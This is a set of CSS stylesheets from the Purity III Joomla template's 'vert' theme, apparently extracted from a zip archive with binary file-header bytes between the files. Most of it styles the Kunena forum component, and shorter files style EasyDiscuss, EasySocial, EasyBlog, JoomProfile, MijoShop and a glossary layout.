@media (max-width: 1199px) {
  #kunena.layout .navbar .navbar-nav.pull-left > div {
    padding-top: 10px;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .btn {
    background: #10bf00;
    color: #ffffff;
    text-align: center;
    text-decoration: none;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse {
    background: #ffffff;
    display: none;
    padding: 0;
    position: absolute;
    width: 100%;
    z-index: 10;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse.in {
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav {
    border: 1px solid #eeeeee;
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li {
    background: #ffffff;
    border: 0;
    margin-right: 0;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a {
    background: #ffffff;
    color: #444444;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:hover,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:focus,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:active {
    color: #10bf00;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li.active a {
    color: #10bf00;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li + li {
    border-top: 1px solid #eeeeee;
  }
}
#kunena.layout .navbar .mobile-user {
  border-radius: 0;
  color: #444444;
  margin-right: 0;
  margin-top: 0 !important;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle {
  background-color: transparent;
  border-radius: 0;
  color: #444444;
  padding: 5px 10px;
  line-height: 20px;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle:hover,
#kunena.layout .navbar .mobile-user .dropdown-toggle:focus,
#kunena.layout .navbar .mobile-user .dropdown-toggle:active {
  background-color: transparent;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle img {
  box-shadow: none;
  height: 17px;
  width: 17px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu {
  background: #ffffff;
  border: 1px solid #eeeeee;
  padding: 20px;
  min-width: 270px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .form-group > div + div {
  margin-top: 10px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .input-group input {
  width: 100%;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail {
  border: 1px solid #eeeeee;
  line-height: 50px;
  height: 50px;
  width: 50px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail .glyphicon {
  font-size: 14px;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .fa-big {
  color: #666666;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .list-unstyled li {
  font-size: 11px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .divider {
  background: #eeeeee;
  height: 1px;
  margin: 10px 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link {
  color: #666666;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:hover,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:focus,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:active {
  color: #10bf00;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .kavatar {
  max-width: 60px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form label {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form a.btn {
  border: 0;
  padding: 0;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .fa {
  margin-right: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu a.btn {
  border: 0;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form .btn {
  border: 0;
  margin: 0;
  padding: 0;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .mobile-user .dropdown-menu a[data-target="#statusTextModal"] {
    pointer-events: none;
  }
}
#kunena.layout .navbar .mobile-user .list-unstyled li + li {
  margin-top: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu {
  left: auto;
  right: 0;
  width: 250px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a {
  color: #444444;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:hover,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:focus,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:active {
  color: #0a7300;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form {
  padding: 0 10px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  display: inline-block;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div .btn {
  font-size: 12px;
  padding: 0 5px 2px;
  text-transform: none;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu .btn {
  padding-top: 0;
  padding-bottom: 0;
}
#kunena.layout #jumpto {
  margin-bottom: 20px;
}
#kunena.layout .table > thead > tr > th,
#kunena.layout .table > tbody > tr > th,
#kunena.layout .table > tfoot > tr > th,
#kunena.layout .table > thead > tr > td,
#kunena.layout .table > tbody > tr > td,
#kunena.layout .table > tfoot > tr > td {
  padding: 15px;
}
#kunena.layout .well {
  background: transparent;
  border: 1px solid #eeeeee;
  box-shadow: none;
}
#kunena.layout .topictitle {
  color: #222222;
  font-weight: 500;
  font-size: 16px;
}
#kunena.layout .topictitle:hover,
#kunena.layout .topictitle:focus,
#kunena.layout .topictitle:active {
  color: #10bf00;
}
#kunena.layout .started {
  color: #999999;
  font-size: 13px;
  margin-top: 3.33333333px;
}
#kunena.layout .container-fluid .col-md-9 {
  padding-right: 0;
}
#kunena.layout .modal {
  position: fixed;
}
#kunena.layout .table {
  border: 1px solid #eeeeee;
  float: none;
}
#kunena.layout .table .col-md-2 .col-md-3,
#kunena.layout .table .col-md-3 .col-md-3 {
  padding-right: 10px;
}
#kunena.layout .table .kavatar {
  background: #ffffff;
  border: 1px solid #eeeeee;
  display: block;
  padding: 3px;
}
#kunena.layout .table thead {
  background: #444444;
  color: #ffffff;
  font-size: 14px;
}
#kunena.layout .table thead .well {
  color: #444444;
}
#kunena.layout .table thead tr td {
  border: 0;
}
#kunena.layout .table thead tr td + td {
  border-left: 1px solid rgba(255, 255, 255, 0.2);
}
#kunena.layout .table tr td {
  border: 1px solid #eeeeee;
  float: none !important;
}
#kunena.layout .table tr td.col-md-5 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-5 {
    float: left;
    width: 33.33333333%;
  }
}
#kunena.layout .table tr td.col-md-2 + .col-md-2 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-2 + .col-md-2 {
    float: left;
    width: 25%;
  }
}
#kunena.layout .table td.hidden-xs > a {
  color: #999999;
}
#kunena.layout .table td.hidden-xs > a:hover,
#kunena.layout .table td.hidden-xs > a:focus,
#kunena.layout .table td.hidden-xs > a:active {
  color: #0a7300;
}
#kunena.layout tbody .col-md-2,
#kunena.layout tbody .col-md-3 {
  color: #666666;
  font-size: 13px;
}
#kunena.layout .btn {
  font-size: 12px;
  padding: 6.66666667px 10px;
  margin-top: 0;
  line-height: 1;
}
#kunena.layout .btn .caret {
  border-top-color: #ffffff;
}
#kunena.layout .btn-default {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
}
#kunena.layout .btn-default .caret {
  border-top-color: #666666;
}
#kunena.layout .btn-default:hover,
#kunena.layout .btn-default:focus,
#kunena.layout .btn-default:active {
  background: #f7f7f7;
}
#kunena.layout .btn-group + .btn-group {
  margin-left: 5px;
}
#kunena.layout #btn_report {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
  padding: 4px 10px;
}
#kunena.layout #btn_report .fa {
  color: #ff8800;
}
#kunena.layout #btn_report:hover,
#kunena.layout #btn_report:focus,
#kunena.layout #btn_report:active {
  border-color: #ff8800;
}
#kunena.layout .kfrontend {
  padding-top: 0;
  margin-bottom: 20px;
  padding-bottom: 0;
}
#kunena.layout .kfrontend:before,
#kunena.layout .kfrontend:after {
  content: " ";
  display: table;
}
#kunena.layout .kfrontend:after {
  clear: both;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa {
  background: transparent;
  border: 1px solid #999999;
  color: #999999;
  height: 28px;
  line-height: 22px;
  padding: 0;
  margin: 8px 12px 0 0;
  visibility: visible;
  text-align: center;
  width: 28px;
  opacity: 0.2;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:before {
  font-size: 24px;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover {
  opacity: 0.5;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover:before {
  color: #ffffff;
}
#kunena.layout .kfrontend h1,
#kunena.layout .kfrontend h2.btn-link {
  background-color: #444444;
  font-size: 17px;
  font-weight: 500;
  padding: 10px 20px;
  margin: 0;
}
#kunena.layout .kfrontend h1 a,
#kunena.layout .kfrontend h2.btn-link a {
  color: #ffffff;
}
#kunena.layout .kfrontend h1 a:hover,
#kunena.layout .kfrontend h2.btn-link a:hover,
#kunena.layout .kfrontend h1 a:focus,
#kunena.layout .kfrontend h2.btn-link a:focus,
#kunena.layout .kfrontend h1 a:active,
#kunena.layout .kfrontend h2.btn-link a:active {
  border-bottom: 0;
  text-decoration: none;
}
#kunena.layout .kfrontend h1:hover,
#kunena.layout .kfrontend h2.btn-link:hover {
  text-decoration: none;
}
#kunena.layout .kfrontend .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
#kunena.layout .kfrontend .section {
  margin-bottom: 0;
}
#kunena.layout .kfrontend .section:before,
#kunena.layout .kfrontend .section:after {
  content: " ";
  display: table;
}
#kunena.layout .kfrontend .section:after {
  clear: both;
}
#kunena.layout .kfrontend .section table {
  border: 1px solid #eeeeee;
}
#kunena.layout .kfrontend .section table th,
#kunena.layout .kfrontend .section table td {
  border: 1px solid #eeeeee;
  padding: 10px 20px;
}
#kunena.layout .kfrontend .section table tr {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table tr.category {
  background-color: #ffffff;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 {
  width: 8%;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a {
  display: block;
  color: #999999;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:hover,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:focus,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:active {
  color: #0a7300;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-8 {
    width: 35%;
  }
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 {
  vertical-align: middle;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 div {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-4 {
  padding-right: 10px;
  margin-top: 5px;
  width: 40px;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-8 {
    width: auto;
    max-width: 80%;
  }
}
#kunena.layout .kfrontend .section table tr.category:nth-child(2n+1) {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table .well {
  background-color: transparent;
  box-shadow: none;
  border: 0;
  padding: 0;
}
#kunena.layout .kfrontend .section table .header-desc {
  margin-top: 10px;
  margin-bottom: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline {
  border-top: 1px solid #eeeeee;
  padding-top: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline li {
  margin-bottom: 5px;
}
#kunena.layout .kfrontend .section table ul.list-inline li a {
  color: #444444;
}
#kunena.layout .kfrontend .section table ul.list-inline li a i {
  color: #999999;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus,
#kunena.layout .kfrontend .section table ul.list-inline li a:active {
  color: #0a7300;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover i,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus i,
#kunena.layout .kfrontend .section table ul.list-inline li a:active i {
  color: #0a7300;
}
#kunena.layout .kfrontend .section table ul.list-inline li i {
  margin-right: 5px;
}
#kunena.layout .kfrontend #kwho .well,
#kunena.layout .kfrontend #kstats .well {
  background-color: #ffffff;
  margin-bottom: 0;
  padding: 20px 0 0;
}
#kunena.layout .kfrontend #kwho .well i,
#kunena.layout .kfrontend #kstats .well i {
  margin-top: 0;
}
#kunena.layout .kfrontend #kwho .well .btn-link,
#kunena.layout .kfrontend #kstats .well .btn-link {
  color: #999999;
  text-align: left;
}
#kunena.layout .kfrontend #kwho .list-unstyled span + span {
  margin-left: 6.66666667px;
}
#kunena.layout .form-search .btn {
  padding: 0 20px;
  top: 0;
  height: 36px;
}
#kunena.layout .form-search .search {
  height: 36px;
}
#kunena.layout .form-search .search input {
  border-color: #cccccc;
  height: 36px;
  top: 0;
  padding: 0 10px;
  left: -11px;
}
#kunena.layout .form-search .search input:focus {
  border-color: #10bf00;
  box-shadow: none;
}
#kunena.layout #search .well {
  padding-top: 0;
}
#kunena.layout #search > .text-center {
  margin-bottom: 30px;
}
#kunena.layout #search #categorylist {
  margin-bottom: 10px;
}
#kunena.layout #search .row {
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 {
  border: 1px solid #eeeeee;
  padding: 10px;
  margin-top: 20px;
}
@media (min-width: 992px) {
  #kunena.layout #search .row > .col-md-6 {
    margin-right: 20px;
    width: 46%;
  }
}
#kunena.layout #search .row > .col-md-6 fieldset {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 select {
  width: 100%;
}
#kunena.layout #search .row > .col-md-6 select + select {
  margin-top: 10px;
}
#kunena.layout #search .row > .col-md-6 legend {
  margin-bottom: 4px;
  font-size: 14px;
  padding: 0 10px;
}
#kunena.layout #postform .column-item fieldset {
  border: 0;
  padding: 0;
}
@media (min-width: 992px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-left: 0;
    margin-right: 0;
  }
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-bottom: 10px;
  }
  #kunena.layout #postform .column-item fieldset .form-group label {
    margin-bottom: 5px;
    width: 100%;
  }
  #kunena.layout #postform .column-item fieldset .form-group #postcatid {
    margin-left: 0;
  }
}
#kunena.layout #postform .column-item fieldset .controls {
  margin-left: 107px;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .controls {
    padding-left: 15px;
    padding-right: 15px;
    margin-left: 0;
  }
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:before,
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  content: " ";
  display: table;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #999999;
  padding: 0;
  margin: 0 10px 10px 0;
  line-height: 40px;
  text-align: center;
  height: 40px;
  width: 40px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label .fa {
  font-size: 18px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"]:checked + label {
  background: transparent;
  border: 1px solid #10bf00;
  color: #10bf00;
  padding: 0;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor {
  border: 0;
  margin-bottom: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li {
  margin-right: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li a {
  border: 1px solid #eeeeee;
  color: #444444;
  padding: 5px 10px;
  line-height: 1;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li.active a {
  background: #10bf00;
  border: 1px solid #10bf00;
  color: #ffffff;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader {
  background: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px;
  height: auto;
  margin-bottom: -1px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:before,
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  content: " ";
  display: table;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor {
  padding: 10px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor:focus {
  box-shadow: none;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item #kpost-attachments .control-label,
  #kunena.layout #postform .column-item #kpost-subscribe .control-label {
    display: block;
    float: none;
    text-align: left;
  }
  #kunena.layout #postform .column-item #kpost-attachments .controls,
  #kunena.layout #postform .column-item #kpost-subscribe .controls {
    padding-left: 0;
  }
  #kunena.layout #postform .column-item #kpost-attachments .string,
  #kunena.layout #postform .column-item #kpost-subscribe .string {
    display: inline;
  }
}
#kunena.layout #postform > div > div > div > fieldset > div > div {
  margin: 0;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog {
  margin: 110px auto;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog h3 {
  margin-top: 0;
}
#kunena.layout #postform > .center {
  margin-bottom: 20px;
}
#kunena.layout #postform #kattach_form .label-info {
  background: transparent;
  color: #444444;
  display: block;
  font-weight: 400;
  padding: 0;
  text-align: left;
  margin-bottom: 5px;
  white-space: normal;
}
#kunena.layout #postform #kattach_form > br {
  display: none;
}
#kunena.layout #files {
  margin-top: 20px;
}
#kunena.layout #files:before,
#kunena.layout #files:after {
  content: " ";
  display: table;
}
#kunena.layout #files:after {
  clear: both;
}
#kunena.layout #files > div {
  border: 1px dashed #eeeeee;
  display: inline-block;
  padding: 10px;
  margin-right: 5px;
  margin-bottom: 10px;
  float: left;
}
#kunena.layout #files > div .btn {
  display: block;
  padding: 5px;
  font-size: 11px;
  margin-top: 5px;
  width: 100%;
}
#kunena.layout #files > div .alert-error {
  background: transparent;
  border: 0;
  color: #ff8800;
  padding: 0;
  margin-bottom: 0;
  margin-top: 10px;
  max-width: 150px;
}
#kunena.layout #dropzone .dropzone .message {
  border: 2px dashed #eeeeee;
  color: #999999;
  margin: 0;
  padding: 20px;
  text-transform: uppercase;
}
@media (max-width: 991px) {
  .view-announcement #kunena.layout #adminForm {
    overflow-x: scroll;
    margin-bottom: 20px;
  }
}
#kunena.layout #editavatar {
  overflow-x: scroll;
}
#kunena.layout #KunenaUserEdit {
  margin-bottom: 20px;
}
#kunena.layout .tab-content tfoot .input-group-btn {
  text-align: right;
}
#kunena.layout .tab-content tfoot .input-group-btn select {
  float: none;
  margin-right: 5px !important;
}
.view-topic #kunena.layout > h1 {
  font-size: 16px;
}
.view-topic #kunena.layout > h1 .fa {
  font-size: 16px;
}
.view-topic #kunena.layout .message {
  border: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div {
  padding: 20px 0;
}
.view-topic #kunena.layout .message > div.col-md-2 {
  border-right: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div.col-md-10 {
  border-left: 1px solid #eeeeee;
  margin-left: -1px;
  padding-left: 20px;
  padding-right: 20px;
}
.view-topic #kunena.layout .message .modal {
  z-index: 100000;
}
.view-topic #kunena.layout .message .modal .modal-header h4 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .message-published {
  border: 0;
  box-shadow: none;
  padding: 0;
  min-height: 0;
}
.view-topic #kunena.layout .message .message-published::after {
  display: none;
}
.view-topic #kunena.layout .message .message-published .pull-right.text-muted {
  display: block;
  float: none !important;
  text-align: right;
  margin-top: 10px;
}
.view-topic #kunena.layout .message .kmsg {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
}
.view-topic #kunena.layout .message .kattach .thumbnails {
  padding: 0;
  margin: 0;
}
.view-topic #kunena.layout .message .kattach .thumbnails:before,
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  content: " ";
  display: table;
}
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  clear: both;
}
.view-topic #kunena.layout .message .kattach .thumbnails li {
  width: auto;
}
.view-topic #kunena.layout .message .kattach .thumbnails .btn-default {
  border: 0;
  padding: 0;
}
.view-topic #kunena.layout .message .col-md-2 {
  padding-left: 10px;
  padding-right: 10px;
}
.view-topic #kunena.layout .message .col-md-2 .topic-starter {
  border: 0;
}
.view-topic #kunena.layout .message .col-md-2 .profilebox li {
  display: block;
  margin-bottom: 6.66666667px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand .btn-default {
  background: transparent;
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand ul li {
  margin-top: 6.66666667px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default {
  padding: 20px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body {
  border: 0;
  padding-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header {
  padding: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header h3 {
  margin-top: 0;
}
.view-user #kunena.layout h1 {
  margin-top: 0;
}
.view-user #kunena.layout .container {
  background: #f7f7f7;
  clear: both;
  padding-bottom: 20px;
  padding-top: 20px;
}
.view-user #kunena.layout .nav-tabs {
  border-bottom: 0;
  margin-bottom: 20px;
}
.view-user #kunena.layout .nav-tabs > li {
  margin-right: 5px;
  margin-bottom: 3.33333333px;
}
.view-user #kunena.layout .nav-tabs > li a {
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
  font-weight: 500;
  text-transform: uppercase;
  padding: 5px 10px;
}
.view-user #kunena.layout .nav-tabs > li a:hover,
.view-user #kunena.layout .nav-tabs > li a:focus,
.view-user #kunena.layout .nav-tabs > li a:active {
  border-color: #10bf00;
  color: #10bf00;
}
.view-user #kunena.layout .nav-tabs > li.active a {
  background: #10bf00;
  border-color: #10bf00;
  color: #ffffff;
}
#kunena.layout .jssocials-share-link {
  box-shadow: none;
  font-size: 10px;
  padding: 4px 6px;
}
#kunena.layout .breadcrumb {
  background-color: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px 10px;
}
#kunena.layout .breadcrumb .divider {
  display: none;
}
#kunena.layout ul.pagination {
  border: 1px solid #eeeeee;
  margin: 0 0 20px;
}
#kunena.layout ul.pagination:before,
#kunena.layout ul.pagination:after {
  content: " ";
  display: table;
}
#kunena.layout ul.pagination:after {
  clear: both;
}
#kunena.layout ul.pagination li {
  display: block;
  float: left;
}
#kunena.layout ul.pagination li + li {
  border-left: 1px solid #eeeeee;
}
#kunena.layout ul.pagination li a {
  border: 0;
  display: inline-block;
  float: none;
  font-size: 14px;
  font-weight: 400;
  margin: -1px;
  padding: 5px 15px;
}
#kunena.layout ul.pagination li a.disabled {
  opacity: 0.4;
  filter: alpha(opacity=40);
}
input#ksearch-keywords {
  width: 100%;
}
.klatest .klatest-items li {
  border: 0;
}
.klatest .klatest-items .klatest-item {
  margin-top: 10px;
}
.klatest .klatest-items .klatest-item .klatest-subject {
  padding-top: 0;
}
div.kstats-module ul.kstats-items li {
  padding: 10px;
}
#kunena.layout #kuserlist-form .label {
  border-radius: 3px;
}
#kunena.layout #kuserlist-form .label.label-default,
#kunena.layout #kuserlist-form .label.label-success,
#kunena.layout #kuserlist-form .label.label-warning,
#kunena.layout #kuserlist-form .label.label-error {
  color: #ffffff;
}
#kunena.layout #adminForm table.table {
  margin-top: 20px;
}
#kunena.layout .input-group-btn .btn {
  margin-left: 10px;
  min-height: 20px;
  line-height: 20px;
}
#kunena.layout #ann-date .input-group-addon,
#kunena.layout #ann-date2 .input-group-addon,
#kunena.layout #ann-date3 .input-group-addon {
  display: inline-block;
  height: 34px;
  line-height: 24px;
}
.com_kunena .datepicker-dropdown {
  background: #ffffff;
  border-color: #d5d5d5;
  padding: 10px;
}PKԜ�\BL���;purity_iii/local/css/themes/vert/extras/com_easydiscuss.cssnu&1i�#discuss-wrapper .nav-collapse.collapse {
  display: block;
}
#discuss-wrapper .nav-collapse.collapse .modal-body .row-fluid {
  margin-left: 0;
  margin-right: 0;
}PKԜ�\+e���;purity_iii/local/css/themes/vert/extras/com_joomprofile.cssnu&1i�.com_joomprofile #f90pro .f90pro-wrapper .f90pro-avtar img {
  width: 100%;
}
.com_joomprofile #f90pro .f90pro-wrapper #f90pro-detail .f90pro-left h3 {
  font-size: 18px;
  line-height: 1.5;
}PKԜ�\=[����:purity_iii/local/css/themes/vert/extras/com_easysocial.cssnu&1i�.com_easysocial .es-toolbar .es-navbar-search .search-query::-moz-placeholder {
  color: #ffffff;
}
.com_easysocial .stream-meta {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .stream-meta .stream-title .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .stream-meta .stream-content .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .es-stream-meta .es-stream-title .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .dropdown-menu > li {
  border: 0;
}
.com_easysocial #es .app-news .checkbox input[type="checkbox"] {
  position: relative;
  margin-left: 0;
}
#es .o-nav--block {
  white-space: normal;
}
.es {
  clear: both;
}PKԜ�\�y���8purity_iii/local/css/themes/vert/extras/com_easyblog.cssnu&1i�#eblog-wrapper .btn-eb-navbar {
  height: 30px;
  width: 44px;
}
#eblog-wrapper #eblog-search .search-input input {
  height: 30px !important;
}
.ezb-mod.mod_easyblogcategories .mod-item {
  padding-top: 20px !important;
}
div#fd.eb .eb-post + .eb-post {
  border-top: 1px solid #eeeeee;
  padding-top: 40px;
}
.mod-es-recent-blogs .es-nav-blogs {
  margin: 0;
  padding: 0;
}
.mod-es-recent-blogs .es-nav-blogs li {
  list-style-type: none;
}
.mod-es-recent-blogs .es-nav-blogs li .media-object {
  margin-bottom: 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media {
  padding: 0 !important;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object {
  float: none !important;
  padding: 0;
  margin: 0 0 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object img {
  max-width: 100%;
}
.mod-easyblogtagcloud .tag-cloud {
  margin: 0 10px 5px 0;
  display: inline-block;
  line-height: normal !important;
}PKԜ�\�3qq;purity_iii/local/css/themes/vert/extras/layout_glossary.cssnu&1i�.glossary-nav {
  position: relative;
  z-index: 10;
  margin-bottom: 40px;
}
.glossary-nav nav {
  padding: 0;
}
.glossary-nav nav.affix {
  top: auto;
  position: relative;
}
.glossary-nav nav .nav-pills {
  background: #fff;
}
.glossary-nav nav .nav-pills > li {
  display: block;
  float: left;
  margin: 0 1px 10px 0;
}
.glossary-nav nav .nav-pills > li > a {
  background: #444444;
  color: #eeeeee;
  font-size: 18px;
  font-weight: 600;
  line-height: normal;
  padding: 0;
  width: 50px;
  height: 50px;
  line-height: 50px;
  text-align: center;
  text-transform: uppercase;
}
.glossary-nav nav .nav-pills > li > a:hover,
.glossary-nav nav .nav-pills > li > a:active,
.glossary-nav nav .nav-pills > li > a:focus {
  background: #10bf00;
  color: #fff;
}
@media screen and (min-width: 991px) {
  .glossary-nav nav.affix {
    top: 57px;
    position: fixed;
  }
  .glossary-nav nav .nav-pills > li > a {
    font-size: 24px;
  }
}
.glossary-group {
  margin-bottom: 40px;
  position: relative;
}
.glossary-group a[name] {
  position: absolute;
  top: -120px;
}
.glossary-group-title {
  background: #f7f7f7;
  color: #222222;
  font-weight: 600;
  font-size: 35px;
  margin: 0 0 20px;
  padding: 15px;
  text-transform: uppercase;
}
.glossary-group-items ul {
  padding: 0;
  margin: 0;
}
.glossary-group-items ul > li {
  list-style: none;
  padding: 0;
}
.glossary-group-items ul > li > a {
  color: #444444;
  display: block;
  font-size: 18px;
  padding: 5px 15px;
}
.glossary-group-items ul > li > a:hover,
.glossary-group-items ul > li > a:active,
.glossary-group-items ul > li > a:focus {
  color: #10bf00;
  text-decoration: none;
}PKԜ�\���OO8purity_iii/local/css/themes/vert/extras/com_mijoshop.cssnu&1i�.com_mijoshop .common-home #content_oc h1,
.com_mijoshop .common-home #content_oc h2 {
  font-size: 24px;
}
.com_mijoshop .box_oc .box-product {
  margin-left: 0;
  padding: 20px;
}
.com_mijoshop .box_oc .box-product > div {
  float: left;
  margin: 0;
  margin-right: 20px;
  width: 100%;
}
.com_mijoshop .box_oc .box-product > div .image {
  display: inline-block;
  border: 1px solid #eeeeee;
  padding: 5px;
  text-align: left;
}
.com_mijoshop .box_oc .box-product > div .image a {
  display: inline-block;
}
.com_mijoshop .box_oc .box-product > div .image img {
  border: 0;
  padding: 0;
}
.com_mijoshop .box_oc .box-product > div .name {
  padding: 10px 0;
  text-align: left;
}
.com_mijoshop .box_oc .box-product > div .price {
  margin: 10px 0;
}
